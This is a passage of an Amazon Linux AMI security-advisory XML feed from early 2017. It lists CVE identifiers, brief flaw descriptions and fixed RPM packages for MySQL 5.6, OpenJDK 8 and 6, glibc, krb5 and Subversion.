CVE-2017-3238 mysql: Server: Optimizer unspecified vulnerability (CPU Jan 2017)
CVE-2016-8327:
1414337:
CVE-2016-8327 mysql: Server: Replication unspecified vulnerability (CPU Jan 2017)
CVE-2016-8318:
1414335:
CVE-2016-8318 mysql: Server: Security: Encryption unspecified vulnerability (CPU Jan 2017)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-8318" title="" id="CVE-2016-8318" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-8327" title="" id="CVE-2016-8327" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3238" title="" id="CVE-2017-3238" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3244" title="" id="CVE-2017-3244" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3257" title="" id="CVE-2017-3257" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3258" title="" id="CVE-2017-3258" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3273" title="" id="CVE-2017-3273" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3313" title="" id="CVE-2017-3313" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3317" title="" id="CVE-2017-3317" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3318" title="" id="CVE-2017-3318" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mysql56-embedded-devel" version="5.6.35" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-embedded-devel-5.6.35-1.23.amzn1.x86_64.rpm</filename></package><package name="mysql56" version="5.6.35" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-5.6.35-1.23.amzn1.x86_64.rpm</filename></package><package name="mysql56-devel" version="5.6.35" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-devel-5.6.35-1.23.amzn1.x86_64.rpm</filename></package><package name="mysql56-server" version="5.6.35" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-server-5.6.35-1.23.amzn1.x86_64.rpm</filename></package><package name="mysql56-libs" version="5.6.35" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-libs-5.6.35-1.23.amzn1.x86_64.rpm</filename></package><package name="mysql56-errmsg" version="5.6.35" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-errmsg-5.6.35-1.23.amzn1.x86_64.rpm</filename></package><package name="mysql56-debuginfo" version="5.6.35" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-debuginfo-5.6.35-1.23.amzn1.x86_64.rpm</filename></package><package name="mysql56-embedded" version="5.6.35" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-embedded-5.6.35-1.23.amzn1.x86_64.rpm</filename></package><package name="mysql56-test" version="5.6.35" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-test-5.6.35-1.23.amzn1.x86_64.rpm</filename></package><package name="mysql56-common" version="5.6.35" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-common-5.6.35-1.23.amzn1.x86_64.rpm</filename></package><package name="mysql56-bench" version="5.6.35" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-bench-5.6.35-1.23.amzn1.x86_64.rpm</filename></package><package name="mysql56-libs" version="5.6.35" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-libs-5.6.35-1.23.amzn1.i686.rpm</filename></package><package name="mysql56-bench" version="5.6.35" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-bench-5.6.35-1.23.amzn1.i686.rpm</filename></package><package name="mysql56-devel" version="5.6.35" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-devel-5.6.35-1.23.amzn1.i686.rpm</filename></package><package name="mysql56-server" version="5.6.35" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-server-5.6.35-1.23.amzn1.i686.rpm</filename></package><package name="mysql56-debuginfo" version="5.6.35" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-debuginfo-5.6.35-1.23.amzn1.i686.rpm</filename></package><package name="mysql56-errmsg" version="5.6.35" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-errmsg-5.6.35-1.23.amzn1.i686.rpm</filename></package><package name="mysql56-test" version="5.6.35" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-test-5.6.35-1.23.amzn1.i686.rpm</filename></package><package name="mysql56-common" version="5.6.35" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-common-5.6.35-1.23.amzn1.i686.rpm</filename></package><package name="mysql56" version="5.6.35" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-5.6.35-1.23.amzn1.i686.rpm</filename></package><package name="mysql56-embedded" version="5.6.35" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-embedded-5.6.35-1.23.amzn1.i686.rpm</filename></package><package name="mysql56-embedded-devel" version="5.6.35" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-embedded-devel-5.6.35-1.23.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-791</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-791: critical priority package update for java-1.8.0-openjdk</title><issued date="2017-01-26 18:00:00" /><updated date="2017-01-26 18:00:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-3289:
1413562:
CVE-2017-3289 OpenJDK: insecure class construction (Hotspot, 8167104)
CVE-2017-3272:
1413554:
CVE-2017-3272 OpenJDK: insufficient protected field access checks in atomic field updaters (Libraries, 8165344)
CVE-2017-3261:
1413653:
CVE-2017-3261 OpenJDK: integer overflow in SocketOutputStream boundary check (Networking, 8164147)
CVE-2017-3253:
It was discovered that the 2D component of OpenJDK performed parsing of iTXt and zTXt PNG image chunks even when configured to ignore metadata. An attacker able to make a Java application parse a specially crafted PNG image could cause the application to consume an excessive amount of memory.
1413583:
CVE-2017-3253 OpenJDK: imageio PNGImageReader failed to honor ignoreMetadata for iTXt and zTXt chunks (2D, 8166988)
CVE-2017-3252:
It was discovered that the JAAS component of OpenJDK did not use the correct way to extract user DN from the result of the user search LDAP query. A specially crafted user LDAP entry could cause the application to use an incorrect DN.
1413906:
CVE-2017-3252 OpenJDK: LdapLoginModule incorrect userDN extraction (JAAS, 8161743)
CVE-2017-3241:
It was discovered that the RMI registry and DCG implementations in the RMI component of OpenJDK performed deserialization of untrusted inputs. A remote attacker could possibly use this flaw to execute arbitrary code with the privileges of RMI registry or a Java RMI application.
1413955:
CVE-2017-3241 OpenJDK: untrusted input deserialization in RMI registry and DCG (RMI, 8156802)
CVE-2017-3231:
1413717:
CVE-2017-3231 OpenJDK: URLClassLoader insufficient access control checks (Networking, 8151934)
CVE-2016-5552:
It was discovered that the Networking component of OpenJDK failed to properly parse user info from the URL. A remote attacker could cause a Java application to incorrectly parse an attacker supplied URL and interpret it differently from other applications processing the same URL.
1413882:
CVE-2016-5552 OpenJDK: incorrect URL parsing in URLStreamHandler (Networking, 8167223)
CVE-2016-5548:
A covert timing channel flaw was found in the DSA implementation in the Libraries component of OpenJDK. A remote attacker could possibly use this flaw to extract certain information about the used key via a timing side channel.
1413920:
CVE-2016-5548 OpenJDK: DSA implementation timing attack (Libraries, 8168728)
CVE-2016-5547:
It was discovered that the Libraries component of OpenJDK did not validate the length of the object identifier read from the DER input before allocating memory to store the OID. An attacker able to make a Java application decode a specially crafted DER input could cause the application to consume an excessive amount of memory.
1413764:
CVE-2016-5547 OpenJDK: missing ObjectIdentifier length check (Libraries, 8168705)
CVE-2016-5546:
It was discovered that the Libraries component of OpenJDK accepted ECSDA signatures using non-canonical DER encoding. This could cause a Java application to accept signature in an incorrect format not accepted by other cryptographic tools.
1413911:
CVE-2016-5546 OpenJDK: incorrect ECDSA signature extraction from the DER input (Libraries, 8168714)
CVE-2016-2183:
A flaw was found in the way the DES/3DES cipher was used as part of the TLS/SSL protocol. A man-in-the-middle attacker could use this flaw to recover some plaintext data by capturing large amounts of encrypted traffic between TLS/SSL server and client if the communication used a DES/3DES based ciphersuite.
A flaw was found in the DES/3DES cipher was used as part of the TLS/SSL protocol. A man-in-the-middle attacker could use this flaw to recover some plaintext data by capturing large amounts of encrypted traffic between TLS/SSL server and client if the communication used a DES/3DES based ciphersuite.
1369383:
CVE-2016-2183 SSL/TLS: Birthday attack against 64-bit block ciphers (SWEET32)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2183" title="" id="CVE-2016-2183" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5546" title="" id="CVE-2016-5546" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5547" title="" id="CVE-2016-5547" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5548" title="" id="CVE-2016-5548" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5552" title="" id="CVE-2016-5552" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3231" title="" id="CVE-2017-3231" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3241" title="" id="CVE-2017-3241" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3252" title="" id="CVE-2017-3252" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3253" title="" id="CVE-2017-3253" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3261" title="" id="CVE-2017-3261" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3272" title="" id="CVE-2017-3272" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3289" title="" id="CVE-2017-3289" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="java-1.8.0-openjdk-javadoc" version="1.8.0.121" release="0.b13.29.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.8.0-openjdk-javadoc-1.8.0.121-0.b13.29.amzn1.noarch.rpm</filename></package><package name="java-1.8.0-openjdk-devel" version="1.8.0.121" release="0.b13.29.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-devel-1.8.0.121-0.b13.29.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-javadoc-zip" version="1.8.0.121" release="0.b13.29.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.8.0-openjdk-javadoc-zip-1.8.0.121-0.b13.29.amzn1.noarch.rpm</filename></package><package name="java-1.8.0-openjdk-headless" version="1.8.0.121" release="0.b13.29.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-headless-1.8.0.121-0.b13.29.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-demo" version="1.8.0.121" release="0.b13.29.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-demo-1.8.0.121-0.b13.29.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk" version="1.8.0.121" release="0.b13.29.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-1.8.0.121-0.b13.29.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-debuginfo" version="1.8.0.121" release="0.b13.29.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-debuginfo-1.8.0.121-0.b13.29.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-src" version="1.8.0.121" release="0.b13.29.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-src-1.8.0.121-0.b13.29.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-debuginfo" version="1.8.0.121" release="0.b13.29.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-debuginfo-1.8.0.121-0.b13.29.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-headless" version="1.8.0.121" release="0.b13.29.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-headless-1.8.0.121-0.b13.29.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk" version="1.8.0.121" release="0.b13.29.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-1.8.0.121-0.b13.29.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-demo" version="1.8.0.121" release="0.b13.29.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-demo-1.8.0.121-0.b13.29.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-devel" version="1.8.0.121" release="0.b13.29.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-devel-1.8.0.121-0.b13.29.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-src" version="1.8.0.121" release="0.b13.29.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-src-1.8.0.121-0.b13.29.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-792</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-792: low priority package update for glibc</title><issued date="2017-02-06 18:00:00" /><updated date="2017-02-06 18:00:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-3075:
A stack overflow vulnerability was found in _nss_dns_getnetbyname_r. On systems with nsswitch configured to include &quot;networks: dns&quot; with a privileged or network-facing service that would attempt to resolve user-provided network names, an attacker could provide an excessively long network name, resulting in stack corruption and code execution.
1321866:
CVE-2016-3075 glibc: Stack overflow in nss_dns_getnetbyname_r
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3075" title="" id="CVE-2016-3075" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="glibc-debuginfo" version="2.17" release="157.169.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-debuginfo-2.17-157.169.amzn1.x86_64.rpm</filename></package><package name="glibc-utils" version="2.17" release="157.169.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-utils-2.17-157.169.amzn1.x86_64.rpm</filename></package><package name="glibc" version="2.17" release="157.169.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-2.17-157.169.amzn1.x86_64.rpm</filename></package><package name="nscd" version="2.17" release="157.169.amzn1" epoch="0" arch="x86_64"><filename>Packages/nscd-2.17-157.169.amzn1.x86_64.rpm</filename></package><package name="glibc-devel" version="2.17" release="157.169.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-devel-2.17-157.169.amzn1.x86_64.rpm</filename></package><package name="glibc-debuginfo-common" version="2.17" release="157.169.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-debuginfo-common-2.17-157.169.amzn1.x86_64.rpm</filename></package><package name="glibc-static" version="2.17" release="157.169.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-static-2.17-157.169.amzn1.x86_64.rpm</filename></package><package name="glibc-headers" version="2.17" release="157.169.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-headers-2.17-157.169.amzn1.x86_64.rpm</filename></package><package name="glibc-common" version="2.17" release="157.169.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-common-2.17-157.169.amzn1.x86_64.rpm</filename></package><package name="glibc-devel" version="2.17" release="157.169.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-devel-2.17-157.169.amzn1.i686.rpm</filename></package><package name="glibc-headers" version="2.17" release="157.169.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-headers-2.17-157.169.amzn1.i686.rpm</filename></package><package name="glibc" version="2.17" release="157.169.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-2.17-157.169.amzn1.i686.rpm</filename></package><package name="glibc-utils" version="2.17" release="157.169.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-utils-2.17-157.169.amzn1.i686.rpm</filename></package><package name="glibc-common" version="2.17" release="157.169.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-common-2.17-157.169.amzn1.i686.rpm</filename></package><package name="glibc-debuginfo-common" version="2.17" release="157.169.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-debuginfo-common-2.17-157.169.amzn1.i686.rpm</filename></package><package name="nscd" version="2.17" release="157.169.amzn1" epoch="0" arch="i686"><filename>Packages/nscd-2.17-157.169.amzn1.i686.rpm</filename></package><package name="glibc-static" version="2.17" release="157.169.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-static-2.17-157.169.amzn1.i686.rpm</filename></package><package name="glibc-debuginfo" version="2.17" release="157.169.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-debuginfo-2.17-157.169.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-793</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-793: low priority package update for krb5</title><issued date="2017-02-06 18:00:00" /><updated date="2017-02-06 18:00:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-3120:
A NULL pointer dereference flaw was found in MIT Kerberos krb5kdc service. An authenticated attacker could use this flaw to cause krb5kdc to dereference a null pointer and crash by making an S4U2Self request, if the restrict_anonymous_to_tgt option was set to true.
1361050:
CVE-2016-3120 krb5: S4U2Self KDC crash when anon is restricted
CVE-2016-3119:
A NULL pointer dereference flaw was found in MIT Kerberos kadmind service. An authenticated attacker with permission to modify a principal entry could use this flaw to cause kadmind to dereference a null pointer and crash by supplying an empty DB argument to the modify_principal command, if kadmind was configured to use the LDAP KDB module.
1319616:
CVE-2016-3119 krb5: null pointer dereference in kadmin
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3119" title="" id="CVE-2016-3119" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3120" title="" id="CVE-2016-3120" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="krb5-devel" version="1.14.1" release="27.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-devel-1.14.1-27.41.amzn1.x86_64.rpm</filename></package><package name="krb5-server" version="1.14.1" release="27.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-server-1.14.1-27.41.amzn1.x86_64.rpm</filename></package><package name="krb5-server-ldap" version="1.14.1" release="27.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-server-ldap-1.14.1-27.41.amzn1.x86_64.rpm</filename></package><package name="krb5-workstation" version="1.14.1" release="27.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-workstation-1.14.1-27.41.amzn1.x86_64.rpm</filename></package><package name="libkadm5" version="1.14.1" release="27.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/libkadm5-1.14.1-27.41.amzn1.x86_64.rpm</filename></package><package name="krb5-pkinit-openssl" version="1.14.1" release="27.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-pkinit-openssl-1.14.1-27.41.amzn1.x86_64.rpm</filename></package><package name="krb5-libs" version="1.14.1" release="27.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-libs-1.14.1-27.41.amzn1.x86_64.rpm</filename></package><package name="krb5-debuginfo" version="1.14.1" release="27.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-debuginfo-1.14.1-27.41.amzn1.x86_64.rpm</filename></package><package name="krb5-debuginfo" version="1.14.1" release="27.41.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-debuginfo-1.14.1-27.41.amzn1.i686.rpm</filename></package><package name="krb5-server" version="1.14.1" release="27.41.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-server-1.14.1-27.41.amzn1.i686.rpm</filename></package><package name="krb5-devel" version="1.14.1" release="27.41.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-devel-1.14.1-27.41.amzn1.i686.rpm</filename></package><package name="krb5-pkinit-openssl" version="1.14.1" release="27.41.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-pkinit-openssl-1.14.1-27.41.amzn1.i686.rpm</filename></package><package name="libkadm5" version="1.14.1" release="27.41.amzn1" epoch="0" arch="i686"><filename>Packages/libkadm5-1.14.1-27.41.amzn1.i686.rpm</filename></package><package name="krb5-libs" version="1.14.1" release="27.41.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-libs-1.14.1-27.41.amzn1.i686.rpm</filename></package><package name="krb5-server-ldap" version="1.14.1" release="27.41.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-server-ldap-1.14.1-27.41.amzn1.i686.rpm</filename></package><package name="krb5-workstation" version="1.14.1" release="27.41.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-workstation-1.14.1-27.41.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-794</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-794: medium priority package update for subversion mod_dav_svn</title><issued date="2017-02-06 18:00:00" /><updated date="2017-02-06 18:00:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-8734:
1397403:
CVE-2016-8734 subversion: unrestricted XML entity expansion in mod_dontdothat and Subversion clients using http(s)://
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-8734" title="" id="CVE-2016-8734" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mod_dav_svn-debuginfo" version="1.9.5" release="2.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod_dav_svn-debuginfo-1.9.5-2.53.amzn1.x86_64.rpm</filename></package><package name="mod_dav_svn" version="1.9.5" release="2.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod_dav_svn-1.9.5-2.53.amzn1.x86_64.rpm</filename></package><package name="mod_dav_svn-debuginfo" version="1.9.5" release="2.53.amzn1" epoch="0" arch="i686"><filename>Packages/mod_dav_svn-debuginfo-1.9.5-2.53.amzn1.i686.rpm</filename></package><package name="mod_dav_svn" version="1.9.5" release="2.53.amzn1" epoch="0" arch="i686"><filename>Packages/mod_dav_svn-1.9.5-2.53.amzn1.i686.rpm</filename></package><package name="subversion-libs" version="1.9.5" release="1.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-libs-1.9.5-1.56.amzn1.x86_64.rpm</filename></package><package name="mod24_dav_svn" version="1.9.5" release="1.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_dav_svn-1.9.5-1.56.amzn1.x86_64.rpm</filename></package><package name="subversion-python26" version="1.9.5" release="1.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-python26-1.9.5-1.56.amzn1.x86_64.rpm</filename></package><package name="subversion-ruby" version="1.9.5" release="1.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-ruby-1.9.5-1.56.amzn1.x86_64.rpm</filename></package><package name="subversion" version="1.9.5" release="1.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-1.9.5-1.56.amzn1.x86_64.rpm</filename></package><package name="subversion-perl" version="1.9.5" release="1.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-perl-1.9.5-1.56.amzn1.x86_64.rpm</filename></package><package name="subversion-debuginfo" version="1.9.5" release="1.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-debuginfo-1.9.5-1.56.amzn1.x86_64.rpm</filename></package><package name="subversion-python27" version="1.9.5" release="1.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-python27-1.9.5-1.56.amzn1.x86_64.rpm</filename></package><package name="subversion-devel" version="1.9.5" release="1.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-devel-1.9.5-1.56.amzn1.x86_64.rpm</filename></package><package name="subversion-tools" version="1.9.5" release="1.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-tools-1.9.5-1.56.amzn1.x86_64.rpm</filename></package><package name="subversion-javahl" version="1.9.5" release="1.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-javahl-1.9.5-1.56.amzn1.x86_64.rpm</filename></package><package name="subversion" version="1.9.5" release="1.56.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-1.9.5-1.56.amzn1.i686.rpm</filename></package><package name="subversion-devel" version="1.9.5" release="1.56.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-devel-1.9.5-1.56.amzn1.i686.rpm</filename></package><package name="mod24_dav_svn" version="1.9.5" release="1.56.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_dav_svn-1.9.5-1.56.amzn1.i686.rpm</filename></package><package name="subversion-ruby" version="1.9.5" release="1.56.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-ruby-1.9.5-1.56.amzn1.i686.rpm</filename></package><package name="subversion-perl" version="1.9.5" release="1.56.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-perl-1.9.5-1.56.amzn1.i686.rpm</filename></package><package name="subversion-debuginfo" version="1.9.5" release="1.56.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-debuginfo-1.9.5-1.56.amzn1.i686.rpm</filename></package><package name="subversion-python27" version="1.9.5" release="1.56.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-python27-1.9.5-1.56.amzn1.i686.rpm</filename></package><package name="subversion-javahl" version="1.9.5" release="1.56.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-javahl-1.9.5-1.56.amzn1.i686.rpm</filename></package><package name="subversion-libs" version="1.9.5" release="1.56.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-libs-1.9.5-1.56.amzn1.i686.rpm</filename></package><package name="subversion-tools" version="1.9.5" release="1.56.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-tools-1.9.5-1.56.amzn1.i686.rpm</filename></package><package name="subversion-python26" version="1.9.5" release="1.56.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-python26-1.9.5-1.56.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-795</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-795: important priority package update for java-1.6.0-openjdk</title><issued date="2017-02-06 18:00:00" /><updated date="2017-02-06 18:00:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-5597:
A flaw was found in the way the Networking component of OpenJDK handled HTTP proxy authentication. A Java application could possibly expose HTTPS server authentication credentials via a plain text network connection to an HTTP proxy if proxy asked for authentication.
1386103:
CVE-2016-5597 OpenJDK: exposure of server authentication credentials to proxy (Networking, 8160838)
CVE-2016-5582:
It was discovered that the Hotspot component of OpenJDK did not properly check arguments of the System.arraycopy() function in certain cases. An untrusted Java application or applet could use this flaw to corrupt virtual machine&#039;s memory and completely bypass Java sandbox restrictions.
1385402:
CVE-2016-5582 OpenJDK: incomplete type checks of System.arraycopy arguments (Hotspot, 8160591)
CVE-2016-5573:
It was discovered that the Hotspot component of OpenJDK did not properly check received Java Debug Wire Protocol (JDWP) packets. An attacker could possibly use this flaw to send debugging commands to a Java program running with debugging enabled if they could make victim&#039;s browser send HTTP requests to the JDWP port of the debugged application.
1385544:
CVE-2016-5573 OpenJDK: insufficient checks of JDWP packets (Hotspot, 8159519)
CVE-2016-5554:
A flaw was found in the way the JMX component of OpenJDK handled classloaders. An untrusted Java application or applet could use this flaw to bypass certain Java sandbox restrictions.
1385714:
CVE-2016-5554 OpenJDK: insufficient classloader consistency checks in ClassLoaderWithRepository (JMX, 8157739)
CVE-2016-5542:
It was discovered that the Libraries component of OpenJDK did not restrict the set of algorithms used for JAR integrity verification. This flaw could allow an attacker to modify content of the JAR file that used weak signing key or hash algorithm.
1385723:
CVE-2016-5542 OpenJDK: missing algorithm restrictions for jar verification (Libraries, 8155973)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5542" title="" id="CVE-2016-5542" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5554" title="" id="CVE-2016-5554" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5573" title="" id="CVE-2016-5573" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5582" title="" id="CVE-2016-5582" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5597" title="" id="CVE-2016-5597" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="java-1.6.0-openjdk-src" version="1.6.0.41" release="1.13.13.1.77.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-src-1.6.0.41-1.13.13.1.77.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-debuginfo" version="1.6.0.41" 